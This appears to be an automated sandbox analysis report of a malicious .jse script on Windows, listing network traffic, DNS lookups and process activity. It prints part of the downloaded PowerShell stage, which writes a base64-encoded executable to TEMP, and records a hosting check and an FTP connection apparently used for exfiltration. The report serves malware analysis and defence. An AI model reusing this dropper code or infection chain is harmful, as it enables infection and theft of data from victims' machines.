                                                                  Dec 20, 2024 17:42:31.263072014 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.263134956 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.263144016 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.263184071 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.265300035 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.265316010 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.265387058 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.265394926 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.265435934 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.268374920 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.268398046 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.268471003 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.268480062 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.268518925 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.271013975 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.271058083 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.271094084 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.271100998 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.271131039 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.271142960 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.273556948 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.273614883 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.273660898 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.273667097 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.273721933 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.343142033 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.343209982 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.343259096 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.343271017 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.343305111 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.343317986 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.450706959 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.450761080 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.451004982 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.451018095 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.451134920 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.452537060 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.452603102 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.452641010 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.452649117 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.452666998 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.452687979 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.455666065 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.455709934 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.455784082 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.455792904 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.455893993 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.458113909 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.458161116 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.458188057 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.458195925 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.458209991 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.458233118 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.461118937 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.461136103 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.461185932 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.461196899 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.461234093 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.462871075 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.462918043 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.462943077 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.462951899 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.462968111 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.462990046 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.463007927 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.463156939 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.463172913 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:36.688641071 CET4970880192.168.2.8208.95.112.1
                                                                  Dec 20, 2024 17:42:36.808145046 CET8049708208.95.112.1192.168.2.8
                                                                  Dec 20, 2024 17:42:36.808228016 CET4970880192.168.2.8208.95.112.1
                                                                  Dec 20, 2024 17:42:36.809194088 CET4970880192.168.2.8208.95.112.1
                                                                  Dec 20, 2024 17:42:36.929117918 CET8049708208.95.112.1192.168.2.8
                                                                  Dec 20, 2024 17:42:37.963941097 CET8049708208.95.112.1192.168.2.8
                                                                  Dec 20, 2024 17:42:38.008157969 CET4970880192.168.2.8208.95.112.1
                                                                  Dec 20, 2024 17:42:40.082735062 CET4971021192.168.2.8195.252.110.253
                                                                  Dec 20, 2024 17:42:40.202387094 CET2149710195.252.110.253192.168.2.8
                                                                  Dec 20, 2024 17:42:40.202486038 CET4971021192.168.2.8195.252.110.253
                                                                  Dec 20, 2024 17:42:40.207353115 CET4971021192.168.2.8195.252.110.253
                                                                  Dec 20, 2024 17:42:40.326992035 CET2149710195.252.110.253192.168.2.8
                                                                  Dec 20, 2024 17:42:40.327219009 CET4971021192.168.2.8195.252.110.253
                                                                  Dec 20, 2024 17:43:29.477066994 CET4970880192.168.2.8208.95.112.1
                                                                  Dec 20, 2024 17:43:29.597132921 CET8049708208.95.112.1192.168.2.8
                                                                  Dec 20, 2024 17:43:29.597199917 CET4970880192.168.2.8208.95.112.1

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 20, 2024 17:42:26.380230904 CET5485353192.168.2.81.1.1.1
                                                                  Dec 20, 2024 17:42:26.827097893 CET53548531.1.1.1192.168.2.8
                                                                  Dec 20, 2024 17:42:36.543636084 CET6146253192.168.2.81.1.1.1
                                                                  Dec 20, 2024 17:42:36.681466103 CET53614621.1.1.1192.168.2.8
                                                                  Dec 20, 2024 17:42:39.463226080 CET6438653192.168.2.81.1.1.1
                                                                  Dec 20, 2024 17:42:40.081818104 CET53643861.1.1.1192.168.2.8

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 20, 2024 17:42:26.380230904 CET192.168.2.81.1.1.10x41e6Standard query (0)files.catbox.moeA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 17:42:36.543636084 CET192.168.2.81.1.1.10xeebfStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 17:42:39.463226080 CET192.168.2.81.1.1.10x3986Standard query (0)ftp.jeepcommerce.rsA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 20, 2024 17:42:26.827097893 CET1.1.1.1192.168.2.80x41e6No error (0)files.catbox.moe108.181.20.35A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 17:42:36.681466103 CET1.1.1.1192.168.2.80xeebfNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 17:42:40.081818104 CET1.1.1.1192.168.2.80x3986No error (0)ftp.jeepcommerce.rs195.252.110.253A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • files.catbox.moe
                                                                  • ip-api.com

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.849708208.95.112.1805212C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 17:42:36.809194088 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                  Host: ip-api.com
                                                                  Connection: Keep-Alive
                                                                  Dec 20, 2024 17:42:37.963941097 CET175INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 16:42:37 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 6
                                                                  Access-Control-Allow-Origin: *
                                                                  X-Ttl: 60
                                                                  X-Rl: 44
                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                  Data Ascii: false


                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.849707108.181.20.354435056C:\Windows\System32\wscript.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 16:42:28 UTC330OUTGET /gj7umd.ps1 HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Language: en-ch
                                                                  UA-CPU: AMD64
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                  Host: files.catbox.moe
                                                                  Connection: Keep-Alive
                                                                  2024-12-20 16:42:29 UTC553INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Fri, 20 Dec 2024 16:42:28 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 1291000
                                                                  Last-Modified: Thu, 19 Dec 2024 10:50:32 GMT
                                                                  Connection: close
                                                                  ETag: "6763fa78-13b2f8"
                                                                  X-Content-Type-Options: nosniff
                                                                  Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                  Accept-Ranges: bytes
                                                                  2024-12-20 16:42:29 UTC15831INData Raw: 24 70 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 78 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 70 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2b 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75
                                                                  Data Ascii: $p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu
                                                                  2024-12-20 16:42:29 UTC16384INData Raw: 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 56 59 76 73 75 41 51 67 41 41 44 6f 45 2b 67 42 41 46 4e 57 69 33 55 49 5a 6f 4d 2b 49 31 63 50 68 4d 31 4a 41 67 43 34 41 77 41 41 41 46 39 65 57 34 76 6c 58 63 49 51 41 4d 7a 4d 7a 4d 7a 4d 56 59 76 73 67 33 34 49 41 48 52 2f 69 30 59 4d 69 77 42 6d 67 7a 67 41 64 47 5a 71 45 4f 68 73 32 77 41 41 69 30 34 4d 69 55 45 4d 67 38 51 45 69 55 59 4d 69 31 59 4d 56 31 50 48 51 67 77 41 41 41 41 41 36 44 6e 58 41 41 41 7a 79 55 43 36 41 67 41 41 41 50 66 69 44 35 44 42 39 39 6b 4c 79 46 48 6f 4f 4e 73 41 41 49 76 34 55 31 66 6f 76 39 6f 41 41 49 74 47 44 49 74 56 43 49 6b 34 69 30 34 4d 69 56 45 45 69 30 59 4d 69 30 30 4d 67 38 51 51 69 55 67 49 2f 30 59 51 58 31 33 43 43 41 42 51 36 41 7a 58 41 41 43 44 78 41 54 2f 54 68 44
                                                                  Data Ascii: zMzMzMzMzMzMVYvsuAQgAADoE+gBAFNWi3UIZoM+I1cPhM1JAgC4AwAAAF9eW4vlXcIQAMzMzMzMVYvsg34IAHR/i0YMiwBmgzgAdGZqEOhs2wAAi04MiUEMg8QEiUYMi1YMV1PHQgwAAAAA6DnXAAAzyUC6AgAAAPfiD5DB99kLyFHoONsAAIv4U1fov9oAAItGDItVCIk4i04MiVEEi0YMi00Mg8QQiUgI/0YQX13CCABQ6AzXAACDxAT/ThD
                                                                  2024-12-20 16:42:29 UTC16384INData Raw: 53 51 41 7a 32 34 6b 64 71 45 78 4a 41 49 6b 64 72 45 78 4a 41 4c 73 2f 73 55 55 41 69 52 33 49 54 45 6b 41 4d 39 75 4a 48 63 78 4d 53 51 43 4a 48 64 42 4d 53 51 43 37 50 49 6c 46 41 49 6b 64 37 45 78 4a 41 44 50 62 69 52 33 77 54 45 6b 41 69 52 33 30 54 45 6b 41 75 32 65 4c 52 51 43 4a 48 52 42 4e 53 51 41 7a 32 34 6b 64 46 45 31 4a 41 49 6b 64 47 45 31 4a 41 4c 75 2f 64 55 55 41 69 52 30 30 54 55 6b 41 4d 39 75 4a 48 54 68 4e 53 51 43 4a 48 54 78 4e 53 51 43 4a 4e 66 78 4c 53 51 43 4a 4e 51 42 4d 53 51 44 48 42 51 68 4d 53 51 44 63 6b 30 67 41 69 51 30 67 54 45 6b 41 69 54 55 6b 54 45 6b 41 78 77 55 73 54 45 6b 41 79 4a 4e 49 41 4d 63 46 52 45 78 4a 41 41 49 41 41 41 44 48 42 55 68 4d 53 51 41 4b 41 41 41 41 78 77 56 51 54 45 6b 41 77 4a 4e 49 41 4b 4e
                                                                  Data Ascii: SQAz24kdqExJAIkdrExJALs/sUUAiR3ITEkAM9uJHcxMSQCJHdBMSQC7PIlFAIkd7ExJADPbiR3wTEkAiR30TEkAu2eLRQCJHRBNSQAz24kdFE1JAIkdGE1JALu/dUUAiR00TUkAM9uJHThNSQCJHTxNSQCJNfxLSQCJNQBMSQDHBQhMSQDck0gAiQ0gTEkAiTUkTEkAxwUsTEkAyJNIAMcFRExJAAIAAADHBUhMSQAKAAAAxwVQTEkAwJNIAKN
                                                                  2024-12-20 16:42:29 UTC16384INData Raw: 43 4f 68 6a 44 51 41 41 68 63 41 50 68 57 51 55 41 67 43 4c 52 43 51 51 69 31 51 6b 55 49 74 4b 42 49 74 55 67 51 52 41 5a 6f 4e 36 43 45 47 4a 52 43 51 51 44 34 52 50 41 67 49 41 69 31 51 6b 56 44 76 54 64 46 61 4c 64 51 79 4c 52 67 53 4c 42 4a 43 35 51 41 41 41 41 47 59 35 53 41 67 50 68 58 34 43 41 67 43 4e 51 67 45 37 52 43 51 55 44 34 52 78 41 67 49 41 69 33 51 6b 45 49 76 51 69 30 51 6b 55 49 6c 55 4a 46 53 4c 51 41 53 4c 42 4c 42 6d 4f 55 67 49 64 51 54 2f 52 43 51 51 69 30 51 6b 65 45 43 4a 52 43 52 34 4f 30 51 6b 58 41 2b 4d 54 76 37 2f 2f 34 74 45 4a 48 41 37 52 43 52 45 44 34 7a 4a 45 77 49 41 4f 30 51 6b 58 41 2b 50 76 78 4d 43 41 44 74 55 4a 42 51 50 68 62 55 54 41 67 43 4c 6e 43 54 4d 41 41 41 41 4d 2f 59 7a 77 4d 64 45 4a 42 41 44 41 41 41
                                                                  Data Ascii: COhjDQAAhcAPhWQUAgCLRCQQi1QkUItKBItUgQRAZoN6CEGJRCQQD4RPAgIAi1QkVDvTdFaLdQyLRgSLBJC5QAAAAGY5SAgPhX4CAgCNQgE7RCQUD4RxAgIAi3QkEIvQi0QkUIlUJFSLQASLBLBmOUgIdQT/RCQQi0QkeECJRCR4O0QkXA+MTv7//4tEJHA7RCRED4zJEwIAO0QkXA+PvxMCADtUJBQPhbUTAgCLnCTMAAAAM/YzwMdEJBADAAA
                                                                  2024-12-20 16:42:29 UTC16384INData Raw: 67 55 6f 41 69 31 6f 45 67 63 4e 38 67 55 6f 41 36 4f 67 59 41 41 43 4e 64 65 54 6f 45 4d 58 2f 2f 34 31 31 78 4f 67 49 78 66 2f 2f 4d 39 74 71 39 6f 67 64 64 49 4a 4b 41 49 6b 64 63 49 4a 4b 41 49 6b 64 5a 49 4a 4b 41 49 6b 64 61 49 4a 4b 41 49 6b 64 59 49 4a 4b 41 49 6b 64 62 49 4a 4b 41 49 6b 64 77 49 4a 4b 41 47 61 4a 48 64 79 46 53 67 43 49 48 66 69 46 53 67 43 4a 48 63 79 46 53 67 44 2f 46 54 41 69 53 41 41 37 77 77 2b 46 71 63 73 42 41 49 6b 64 37 49 56 4b 41 49 6b 39 65 49 4a 4b 41 49 6b 39 66 49 4a 4b 41 49 6b 39 67 49 4a 4b 41 49 6b 39 54 49 52 4b 41 49 6b 39 55 49 52 4b 41 4c 67 4b 41 41 41 41 58 37 6e 36 41 41 41 41 58 6d 61 4a 48 58 57 43 53 67 43 49 48 58 65 43 53 67 43 49 48 5a 43 43 53 67 42 6d 69 52 31 55 68 45 6f 41 6f 34 53 43 53 67 43
                                                                  Data Ascii: gUoAi1oEgcN8gUoA6OgYAACNdeToEMX//411xOgIxf//M9tq9ogddIJKAIkdcIJKAIkdZIJKAIkdaIJKAIkdYIJKAIkdbIJKAIkdwIJKAGaJHdyFSgCIHfiFSgCJHcyFSgD/FTAiSAA7ww+FqcsBAIkd7IVKAIk9eIJKAIk9fIJKAIk9gIJKAIk9TIRKAIk9UIRKALgKAAAAX7n6AAAAXmaJHXWCSgCIHXeCSgCIHZCCSgBmiR1UhEoAo4SCSgC
                                                                  2024-12-20 16:42:30 UTC16384INData Raw: 56 6c 65 4c 66 51 69 4c 52 30 43 4c 64 7a 69 4c 58 7a 79 4a 52 66 79 4c 52 51 79 4e 54 62 7a 6f 6a 51 59 41 41 49 74 2f 4e 49 74 4e 2f 49 76 57 39 39 49 6a 30 59 76 44 49 38 59 4c 30 41 50 58 69 30 57 38 6a 59 51 43 65 4b 52 71 31 38 48 41 42 77 50 47 69 2f 34 6a 2b 49 76 51 39 39 49 6a 30 77 76 58 41 31 58 41 6a 59 77 4b 56 72 66 48 36 4d 48 42 44 41 50 49 69 39 48 33 30 69 50 57 69 2f 6b 6a 2b 41 76 58 41 31 58 45 6a 5a 51 61 32 33 41 67 4a 4d 48 4b 44 77 50 52 69 39 6b 6a 32 6f 76 36 39 39 63 6a 2b 41 76 37 41 33 33 49 6a 62 51 33 37 73 36 39 77 63 48 4f 43 67 50 79 69 58 55 4d 39 39 59 6a 38 59 76 36 49 33 30 4d 43 2f 63 44 64 63 79 4e 68 41 61 76 44 33 7a 31 69 33 55 4d 77 63 41 48 41 38 61 4c 2b 50 66 58 49 2f 71 4c 33 69 50 59 43 2f 73 44 66 64 43
                                                                  Data Ascii: VleLfQiLR0CLdziLXzyJRfyLRQyNTbzojQYAAIt/NItN/IvW99Ij0YvDI8YL0APXi0W8jYQCeKRq18HABwPGi/4j+IvQ99Ij0wvXA1XAjYwKVrfH6MHBDAPIi9H30iPWi/kj+AvXA1XEjZQa23AgJMHKDwPRi9kj2ov699cj+Av7A33IjbQ37s69wcHOCgPyiXUM99Yj8Yv6I30MC/cDdcyNhAavD3z1i3UMwcAHA8aL+PfXI/qL3iPYC/sDfdC
                                                                  2024-12-20 16:42:30 UTC16384INData Raw: 74 6e 44 6a 44 37 5a 52 34 79 76 79 64 42 4d 7a 30 6f 58 32 44 35 2f 43 6a 58 51 53 2f 34 58 32 44 34 55 38 39 50 2f 2f 44 37 5a 77 35 41 2b 32 55 65 51 72 38 6e 51 50 4d 39 4b 46 39 67 2b 66 77 6f 31 30 45 76 2f 72 41 6a 50 32 68 66 59 50 68 52 6e 30 2f 2f 2b 4c 55 4f 55 37 55 65 56 30 64 51 2b 32 38 67 2b 32 55 65 55 72 38 6e 51 54 4d 39 4b 46 39 67 2b 66 77 6f 31 30 45 76 2b 46 39 67 2b 46 38 2f 50 2f 2f 77 2b 32 63 4f 59 50 74 6c 48 6d 4b 2f 4a 30 45 7a 50 53 68 66 59 50 6e 38 4b 4e 64 42 4c 2f 68 66 59 50 68 64 54 7a 2f 2f 38 50 74 6e 44 6e 44 37 5a 52 35 79 76 79 64 42 4d 7a 30 6f 58 32 44 35 2f 43 6a 58 51 53 2f 34 58 32 44 34 57 31 38 2f 2f 2f 44 37 5a 77 36 41 2b 32 55 65 67 72 38 6e 51 50 4d 39 4b 46 39 67 2b 66 77 6f 31 30 45 76 2f 72 41 6a 50
                                                                  Data Ascii: tnDjD7ZR4yvydBMz0oX2D5/CjXQS/4X2D4U89P//D7Zw5A+2UeQr8nQPM9KF9g+fwo10Ev/rAjP2hfYPhRn0//+LUOU7UeV0dQ+28g+2UeUr8nQTM9KF9g+fwo10Ev+F9g+F8/P//w+2cOYPtlHmK/J0EzPShfYPn8KNdBL/hfYPhdTz//8PtnDnD7ZR5yvydBMz0oX2D5/CjXQS/4X2D4W18///D7Zw6A+2Uegr8nQPM9KF9g+fwo10Ev/rAjP
                                                                  2024-12-20 16:42:30 UTC16384INData Raw: 56 65 78 53 55 57 61 4a 54 66 71 4c 54 65 44 2f 73 61 77 41 41 41 44 2f 30 49 6c 46 30 49 58 41 44 34 54 6f 41 41 41 41 6a 55 51 41 43 44 30 41 42 41 41 41 64 78 50 6f 4f 35 55 41 41 49 76 45 68 63 42 30 48 4d 63 41 7a 4d 77 41 41 4f 73 52 55 4f 68 69 32 2f 2f 2f 57 59 58 41 64 41 6e 48 41 4e 33 64 41 41 43 44 77 41 69 4a 52 65 69 46 77 41 2b 45 71 77 41 41 41 50 39 31 30 49 76 59 55 31 65 4e 52 65 78 51 69 30 58 67 61 67 44 2f 73 4b 77 41 41 41 44 2f 56 65 52 49 68 63 42 2b 48 59 74 4e 31 49 4d 35 41 48 59 56 5a 6f 73 37 69 78 5a 6d 69 54 71 44 42 67 4b 44 77 77 4c 2f 43 55 69 46 77 48 2f 6d 2f 33 58 6f 36 43 76 2b 2f 2f 39 5a 4d 38 42 41 6a 57 58 49 58 31 75 4c 54 66 77 7a 7a 65 68 41 52 77 41 41 79 63 4d 7a 30 6a 6b 54 64 4f 61 4a 56 65 69 4c 78 34 50
                                                                  Data Ascii: VexSUWaJTfqLTeD/sawAAAD/0IlF0IXAD4ToAAAAjUQACD0ABAAAdxPoO5UAAIvEhcB0HMcAzMwAAOsRUOhi2///WYXAdAnHAN3dAACDwAiJReiFwA+EqwAAAP910IvYU1eNRexQi0XgagD/sKwAAAD/VeRIhcB+HYtN1IM5AHYVZos7ixZmiTqDBgKDwwL/CUiFwH/m/3Xo6Cv+//9ZM8BAjWXIX1uLTfwzzehARwAAycMz0jkTdOaJVeiLx4P
                                                                  2024-12-20 16:42:30 UTC16384INData Raw: 69 30 51 6b 43 50 66 78 69 2f 43 4c 77 2f 64 6b 4a 42 43 4c 79 49 76 47 39 32 51 6b 45 41 50 52 36 30 65 4c 79 49 74 63 4a 42 43 4c 56 43 51 4d 69 30 51 6b 43 4e 48 70 30 64 76 52 36 74 48 59 43 38 6c 31 39 50 66 7a 69 2f 44 33 5a 43 51 55 69 38 69 4c 52 43 51 51 39 2b 59 44 30 58 49 4f 4f 31 51 6b 44 48 63 49 63 67 38 37 52 43 51 49 64 67 6c 4f 4b 30 51 6b 45 42 74 55 4a 42 51 7a 32 79 74 45 4a 41 67 62 56 43 51 4d 39 39 72 33 32 49 50 61 41 49 76 4b 69 39 4f 4c 32 59 76 49 69 38 5a 65 77 68 41 41 69 2f 39 56 69 2b 78 52 55 59 74 46 44 46 65 4c 66 51 69 46 77 48 51 43 69 54 69 46 2f 33 55 58 36 4d 58 30 2f 2f 2f 48 41 42 59 41 41 41 44 6f 61 50 54 2f 2f 7a 50 41 36 5a 41 42 41 41 43 44 66 52 41 41 64 41 79 44 66 52 41 43 66 4e 32 44 66 52 41 6b 66 39 65
                                                                  Data Ascii: i0QkCPfxi/CLw/dkJBCLyIvG92QkEAPR60eLyItcJBCLVCQMi0QkCNHp0dvR6tHYC8l19Pfzi/D3ZCQUi8iLRCQQ9+YD0XIOO1QkDHcIcg87RCQIdglOK0QkEBtUJBQz2ytEJAgbVCQM99r32IPaAIvKi9OL2YvIi8ZewhAAi/9Vi+xRUYtFDFeLfQiFwHQCiTiF/3UX6MX0///HABYAAADoaPT//zPA6ZABAACDfRAAdAyDfRACfN2DfRAkf9e
                                                                  2024-12-20 16:42:30 UTC16384INData Raw: 51 43 53 41 44 34 56 78 2f 2f 2f 2f 4d 38 6b 37 32 51 2b 45 5a 2f 2f 2f 2f 34 6f 54 69 59 33 63 2f 66 2f 2f 69 59 33 59 2f 66 2f 2f 69 59 32 34 2f 66 2f 2f 69 4a 58 76 2f 66 2f 2f 68 4e 49 50 68 49 34 4b 41 41 42 44 4d 2f 61 4a 6e 63 44 39 2f 2f 38 35 74 64 7a 39 2f 2f 38 50 6a 48 6b 4b 41 41 43 4e 51 75 41 38 57 48 63 50 44 37 37 43 44 37 36 41 63 44 6c 49 41 49 50 67 44 2b 73 43 4d 38 41 50 76 6f 54 42 6b 44 6c 49 41 47 6f 48 77 66 67 45 57 59 6d 46 6a 50 33 2f 2f 7a 76 42 44 34 63 67 43 67 41 41 2f 79 53 46 41 38 56 42 41 49 4f 4e 36 50 33 2f 2f 2f 2b 4a 74 59 6a 39 2f 2f 2b 4a 74 62 7a 39 2f 2f 2b 4a 74 63 6a 39 2f 2f 2b 4a 74 63 7a 39 2f 2f 2b 4a 74 66 44 39 2f 2f 2b 4a 74 63 54 39 2f 2f 2f 70 36 51 6b 41 41 41 2b 2b 77 6f 50 6f 49 48 52 4b 67 2b 67
                                                                  Data Ascii: QCSAD4Vx////M8k72Q+EZ////4oTiY3c/f//iY3Y/f//iY24/f//iJXv/f//hNIPhI4KAABDM/aJncD9//85tdz9//8PjHkKAACNQuA8WHcPD77CD76AcDlIAIPgD+sCM8APvoTBkDlIAGoHwfgEWYmFjP3//zvBD4cgCgAA/ySFA8VBAION6P3///+JtYj9//+Jtbz9//+Jtcj9//+Jtcz9//+JtfD9//+JtcT9///p6QkAAA++woPoIHRKg+g


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:1
                                                                  Start time:11:42:24
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse"
                                                                  Imagebase:0x7ff708b10000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:11:42:30
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
